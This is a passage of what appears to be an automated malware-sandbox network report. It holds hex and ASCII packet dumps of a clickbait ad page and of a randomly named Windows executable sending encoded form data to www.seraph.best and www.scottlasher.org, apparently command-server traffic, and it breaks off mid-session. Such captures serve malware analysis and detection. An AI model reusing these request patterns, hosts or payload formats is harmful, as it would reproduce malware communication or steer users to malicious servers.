                                                                      Nov 6, 2024 05:23:51.677479982 CET1236INData Raw: 64 69 61 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 34 36 30 70 78 29 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66
                                                                      Data Ascii: dia.css" media="all and (max-width:1460px)" /> <link rel="stylesheet" href="css/popup.css" /> <link rel="icon" href="img/favicon.ico" sizes="32x32" /> <link rel="icon" href="img/favicon.ico" sizes="192x192" /> <
                                                                      Nov 6, 2024 05:23:51.677489996 CET1236INData Raw: 63 61 74 65 67 6f 72 79 3d 68 65 61 6c 74 68 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e d0 97 d0 b4 d0 be d1 80 d0 be d0 b2 d1 8c d0 b5 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: category=health" target="_blank"></a></li> <li><a href="category.php?category=cooking" target="_blank"></a></li> </ul>
                                                                      Nov 6, 2024 05:23:51.677500963 CET1236INData Raw: 74 65 72 5f 5f 79 61 6d 20 66 69 78 5f 68 65 69 67 68 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 73 34
                                                                      Data Ascii: ter__yam fix_height" target="_blank"> <img src="img/s4.jpeg"/> </a> <div class="item_text"> <a href="https://www.jivatop.online/lander/bude
                                                                      Nov 6, 2024 05:23:51.677511930 CET848INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 69 76 61 74 6f 70 2e 6f 6e 6c 69 6e 65 2f 6c 61 6e 64 65 72 2f 79 75 72 69 73 74 2d 70 72 65 64 75 70 72 65
                                                                      Data Ascii: <a href="https://www.jivatop.online/lander/yurist-predupredila-rossiyan-o-risce-poteryat-imushchestvo/?keyword={{search_phrase}}&utm_content={{banner_id}}&utm_campaign={3}&utm_source={{advertiser_id}}&sub_id_1={{geo}}&s
                                                                      Nov 6, 2024 05:23:51.677521944 CET1236INData Raw: 67 65 6e 64 65 72 7d 7d 26 73 75 62 5f 69 64 5f 33 3d 7b 7b 61 67 65 7d 7d 26 73 75 62 5f 69 64 5f 34 3d 7b 4e 45 57 53 2b 57 48 49 54 45 7d 26 73 75 62 5f 69 64 5f 35 3d 7b 7b 75 73 65 72 5f 74 69 6d 65 7a 6f 6e 65 7d 7d 26 73 75 62 5f 69 64 5f
                                                                      Data Ascii: gender}}&sub_id_3={{age}}&sub_id_4={NEWS+WHITE}&sub_id_5={{user_timezone}}&sub_id_6={0}&sub_id_7={{impression_weekday}}&sub_id_8={{impression_hour}}" class="item_text_title counter__yam" target="_blank">
                                                                      Nov 6, 2024 05:23:51.677536011 CET1236INData Raw: 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 62 31 2e 6a 70 65 67 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                      Data Ascii: <img src="img/b1.jpeg"/> </a> <div class="item_text"> <a href="https://www.jivatop.online/lander/portit-zhizn-blizcim-i-collegam--obnarodovana-otvratitelnaya-privich
                                                                      Nov 6, 2024 05:23:51.677547932 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 72 69 64 2d 62 6c 6f 63 6b 20 62 6c 6f 63 6b 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: </h2> <div class="grid-block block1"> <div class="item"> <a href="https://www.jivatop.online/lander/ridala-pryamo-na-stsene--v-seme-semenovich-str
                                                                      Nov 6, 2024 05:23:51.677558899 CET1236INData Raw: 20 d0 bd d0 b0 20 d1 81 d1 86 d0 b5 d0 bd d0 b5 3a 20 d0 b2 20 d1 81 d0 b5 d0 bc d1 8c d0 b5 20 d0 a1 d0 b5 d0 bc d0 b5 d0 bd d0 be d0 b2 d0 b8 d1 87 20 d1 81 d1 82 d1 80 d0 b0 d1 88 d0 bd d0 be d0 b5 20 d0 b3 d0 be d1 80 d0 b5 20 20 20 20 20 20
                                                                      Data Ascii: : </a> <div class="item_text_footer"> <div class="item_time">4
                                                                      Nov 6, 2024 05:23:51.677568913 CET848INData Raw: 5f 32 3d 7b 7b 67 65 6e 64 65 72 7d 7d 26 73 75 62 5f 69 64 5f 33 3d 7b 7b 61 67 65 7d 7d 26 73 75 62 5f 69 64 5f 34 3d 7b 4e 45 57 53 2b 57 48 49 54 45 7d 26 73 75 62 5f 69 64 5f 35 3d 7b 7b 75 73 65 72 5f 74 69 6d 65 7a 6f 6e 65 7d 7d 26 73 75
                                                                      Data Ascii: _2={{gender}}&sub_id_3={{age}}&sub_id_4={NEWS+WHITE}&sub_id_5={{user_timezone}}&sub_id_6={0}&sub_id_7={{impression_weekday}}&sub_id_8={{impression_hour}}" class="item_text_title counter__yam" target="_blank">
                                                                      Nov 6, 2024 05:23:51.682486057 CET1236INData Raw: 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 7b 7b 62 61 6e 6e 65 72 5f 69 64 7d 7d 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 7b 33 7d 26 75 74 6d 5f 73 6f 75 72 63 65 3d 7b 7b 61 64 76 65 72 74 69 73 65 72 5f 69 64 7d 7d 26 73 75 62 5f 69 64 5f 31 3d
                                                                      Data Ascii: &utm_content={{banner_id}}&utm_campaign={3}&utm_source={{advertiser_id}}&sub_id_1={{geo}}&sub_id_2={{gender}}&sub_id_3={{age}}&sub_id_4={NEWS+WHITE}&sub_id_5={{user_timezone}}&sub_id_6={0}&sub_id_7={{impression_weekday}}&sub_id_8={{impression_


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.65001652.20.84.62804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:57.408746004 CET744OUTPOST /dse0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.seraph.best
                                                                      Origin: http://www.seraph.best
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.seraph.best/dse0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 78 67 76 4e 66 39 70 63 34 2b 70 4b 5a 6b 54 34 56 39 63 72 62 54 56 56 77 38 68 57 69 54 56 44 67 32 36 68 74 4f 56 55 41 67 68 66 4f 41 71 64 41 6e 32 6f 36 63 72 49 59 73 2b 46 66 4d 77 42 4e 37 50 6c 33 78 45 6e 45 4b 6c 41 55 59 77 6d 74 6c 38 39 32 75 37 33 7a 59 77 36 57 4a 37 34 50 6c 42 55 71 6d 30 69 37 44 32 57 63 61 53 72 30 79 39 5a 31 75 75 66 47 6e 56 4a 37 59 6a 6e 49 32 76 4a 6a 36 59 4f 50 51 65 54 32 4e 7a 51 4a 35 65 70 5a 61 51 56 68 56 7a 79 67 4f 37 79 62 37 5a 65 76 38 65 37 51 32 46 44 7a 43 59 35 32 71 67 32 59 75 71 45 4b 4c 58 63 56 37 46 78 42 55 51 6f 74 72 57 53 6d 54 65 5a
                                                                      Data Ascii: 08rl=xgvNf9pc4+pKZkT4V9crbTVVw8hWiTVDg26htOVUAghfOAqdAn2o6crIYs+FfMwBN7Pl3xEnEKlAUYwmtl892u73zYw6WJ74PlBUqm0i7D2WcaSr0y9Z1uufGnVJ7YjnI2vJj6YOPQeT2NzQJ5epZaQVhVzygO7yb7Zev8e7Q2FDzCY52qg2YuqEKLXcV7FxBUQotrWSmTeZ
                                                                      Nov 6, 2024 05:23:58.064630032 CET705INHTTP/1.1 405 Not Allowed
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:23:57 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 556
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.65001752.20.84.62804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:59.951400042 CET768OUTPOST /dse0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.seraph.best
                                                                      Origin: http://www.seraph.best
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.seraph.best/dse0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 78 67 76 4e 66 39 70 63 34 2b 70 4b 66 46 6a 34 53 76 30 72 5a 7a 56 55 70 63 68 57 33 6a 56 48 67 32 32 68 74 50 67 50 41 53 31 66 4e 68 61 64 42 6d 32 6f 35 63 72 49 41 63 2b 45 53 73 77 4b 4e 37 44 74 33 7a 51 6e 45 4c 42 41 55 59 67 6d 75 55 38 2b 32 2b 37 78 37 34 77 34 4c 5a 37 34 50 6c 42 55 71 6d 67 59 37 41 47 57 63 72 69 72 32 54 39 59 71 65 75 63 50 48 56 4a 70 6f 6a 6a 49 32 76 33 6a 35 63 67 50 53 32 54 32 49 33 51 4a 4d 71 71 4d 4b 51 54 2f 6c 7a 6e 6f 39 6d 4f 43 49 59 46 68 2f 43 46 50 42 42 2f 2f 55 46 6a 71 5a 67 56 4b 2b 4b 47 4b 4a 50 75 56 62 46 62 44 55 6f 6f 2f 38 61 31 70 6e 37 36 73 68 4b 6b 79 70 37 71 65 43 69 36 78 4e 54 38 62 2b 56 33 6d 51 3d 3d
                                                                      Data Ascii: 08rl=xgvNf9pc4+pKfFj4Sv0rZzVUpchW3jVHg22htPgPAS1fNhadBm2o5crIAc+ESswKN7Dt3zQnELBAUYgmuU8+2+7x74w4LZ74PlBUqmgY7AGWcrir2T9YqeucPHVJpojjI2v3j5cgPS2T2I3QJMqqMKQT/lzno9mOCIYFh/CFPBB//UFjqZgVK+KGKJPuVbFbDUoo/8a1pn76shKkyp7qeCi6xNT8b+V3mQ==
                                                                      Nov 6, 2024 05:24:00.607976913 CET705INHTTP/1.1 405 Not Allowed
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 556
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.65001852.20.84.62804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:02.499737024 CET1781OUTPOST /dse0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.seraph.best
                                                                      Origin: http://www.seraph.best
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.seraph.best/dse0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 78 67 76 4e 66 39 70 63 34 2b 70 4b 66 46 6a 34 53 76 30 72 5a 7a 56 55 70 63 68 57 33 6a 56 48 67 32 32 68 74 50 67 50 41 53 74 66 4e 54 43 64 41 46 4f 6f 33 38 72 49 4a 38 2b 5a 53 73 77 74 4e 2f 76 70 33 7a 63 64 45 4a 4a 41 53 2b 73 6d 76 6d 55 2b 38 2b 37 78 33 59 77 39 57 4a 36 34 50 6c 51 64 71 6d 77 59 37 41 47 57 63 6f 36 72 67 53 39 59 6f 65 75 66 47 6e 55 47 37 59 69 2b 49 32 33 42 6a 36 77 65 49 6a 57 54 32 6f 48 51 53 65 43 71 52 36 51 52 2b 6c 79 69 6f 39 71 72 43 49 45 4a 68 38 65 72 50 47 4a 2f 37 42 6f 4b 32 37 34 77 59 38 65 77 65 62 72 6e 52 65 5a 53 61 55 55 41 34 4e 6d 52 69 57 66 69 71 32 6d 54 39 4c 4f 70 63 30 75 41 35 37 6d 55 51 74 6f 6d 6d 56 41 30 70 63 38 4a 51 38 2b 49 33 33 76 75 36 42 68 44 7a 57 38 71 2b 33 6a 76 79 6b 78 56 34 77 66 51 32 62 54 71 71 6e 30 35 58 50 39 64 78 79 59 6b 6e 43 79 6c 64 31 33 59 36 45 63 65 36 67 77 4c 42 58 70 72 2b 73 63 68 59 5a 65 76 6a 47 46 7a 67 58 6c 6f 54 34 32 32 56 77 67 64 50 69 71 52 61 49 54 37 33 44 2f 6b 68 [TRUNCATED]
                                                                      Data Ascii: 08rl=xgvNf9pc4+pKfFj4Sv0rZzVUpchW3jVHg22htPgPAStfNTCdAFOo38rIJ8+ZSswtN/vp3zcdEJJAS+smvmU+8+7x3Yw9WJ64PlQdqmwY7AGWco6rgS9YoeufGnUG7Yi+I23Bj6weIjWT2oHQSeCqR6QR+lyio9qrCIEJh8erPGJ/7BoK274wY8ewebrnReZSaUUA4NmRiWfiq2mT9LOpc0uA57mUQtommVA0pc8JQ8+I33vu6BhDzW8q+3jvykxV4wfQ2bTqqn05XP9dxyYknCyld13Y6Ece6gwLBXpr+schYZevjGFzgXloT422VwgdPiqRaIT73D/khWDYKa3wauZzUiXL7q5ziHFmHNPROHfoTYKWOfiZPrJ7w3xHlBOGXIj7vCy9qHf+SeACR0Nj51pgwvcd0k8GZMbjmiXNkZqsODn2leJ6hJtSM3HAPBIUrgzN/Fa6p+xIz+J3K98/e1xDBcm4D4Xs5kHPJ1SE9owrPCSr47UsbFppfFEFXHuwsSz3GEYNd+lcq3u+FHNtGKMzetGt6LNfA8NfJNBB8nx1FJDIS1p63lsCIGQclbegC4isUP20691mUVFjeXyEPEv+hDvBsICLiJIri7mMAoaRNrwSw8t77WYBBq1cIm/a7Ozd9AhHXEZyk6cVlFd2XppIRvIgEjwdo0JOf1od69cQ/PF+vIiFXqmak84lGGIDgqajxvDTDOKMhG/2KN8O3+riOefcLtZpIYyyiNbOwLcO5jaQBwCngTQMtMVtgb0nwaGcQq6R9HaGMA7tsjYSgZYaojUku2Iapiv+hVHtgPxH4xsSs0CTb5iSHNeMNC32ov9D/CLyYFT6xEFSPlhzcDVwNthuK7Mjza73dhruT7IZkXt772LoBCk3bdzDyjy2bII8BDpRdk6IYRR6oUe4VpDvJKEGndYQlzrH7ELrODJMDmI2sV4xUAF8cF5WrU9yNccVDYs0lO05y6Re3JY4H4+otUOAJm03JZKkbVFKWgpiTz9 [TRUNCATED]
                                                                      Nov 6, 2024 05:24:03.153616905 CET705INHTTP/1.1 405 Not Allowed
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:03 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 556
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.65001952.20.84.62804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:05.039463043 CET485OUTGET /dse0/?IrPLc=Knb4R&08rl=8iHtcJIG/+RIWBvECvIOVB8mvr8kzBU7qmWzhsUPOht4KTOzG0/L7NLTG/7/XZMHEoTZ0gMQWo8dRZRzp2QjseON87NIWLv0fW4/6GkG2GuzRp6o1iE2qd+7VCEw8b7pInbsgMs= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.seraph.best
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:24:05.691200018 CET359INHTTP/1.1 307 Temporary Redirect
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:05 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 168
                                                                      Connection: close
                                                                      Location: http://www.seraph.best/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.6500203.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:10.780299902 CET756OUTPOST /qfli/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.scottlasher.org
                                                                      Origin: http://www.scottlasher.org
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.scottlasher.org/qfli/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 4e 6a 4c 70 6a 77 62 34 71 4c 70 37 34 75 41 62 48 4d 68 42 67 7a 6e 4b 44 2b 4c 75 69 48 44 69 4f 6b 6e 30 75 75 44 62 66 30 71 71 41 52 6f 4f 37 42 38 33 70 6f 56 4e 6f 73 6e 6c 64 37 32 79 6f 6c 5a 7a 44 6e 61 38 53 45 67 39 42 55 4e 37 31 32 55 6f 53 62 39 4c 47 72 49 76 42 49 4d 4c 6e 63 45 74 41 42 75 34 39 52 35 70 4f 6a 69 69 42 38 43 63 39 46 4d 68 55 4a 33 72 62 7a 67 6e 41 31 42 36 64 73 6a 56 46 33 50 56 57 66 51 61 75 6d 4a 35 6d 44 2f 68 33 38 4d 58 78 30 71 52 72 31 6e 67 63 54 39 6d 63 56 76 6a 32 39 34 34 70 33 54 4f 71 48 39 6d 32 6e 31 77 56 79 4d 78 6a 63 41 4d 43 7a 6c 66 4f 50 66 65
                                                                      Data Ascii: 08rl=NjLpjwb4qLp74uAbHMhBgznKD+LuiHDiOkn0uuDbf0qqARoO7B83poVNosnld72yolZzDna8SEg9BUN712UoSb9LGrIvBIMLncEtABu49R5pOjiiB8Cc9FMhUJ3rbzgnA1B6dsjVF3PVWfQaumJ5mD/h38MXx0qRr1ngcT9mcVvj2944p3TOqH9m2n1wVyMxjcAMCzlfOPfe


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.6500213.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:13.323396921 CET780OUTPOST /qfli/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.scottlasher.org
                                                                      Origin: http://www.scottlasher.org
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.scottlasher.org/qfli/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
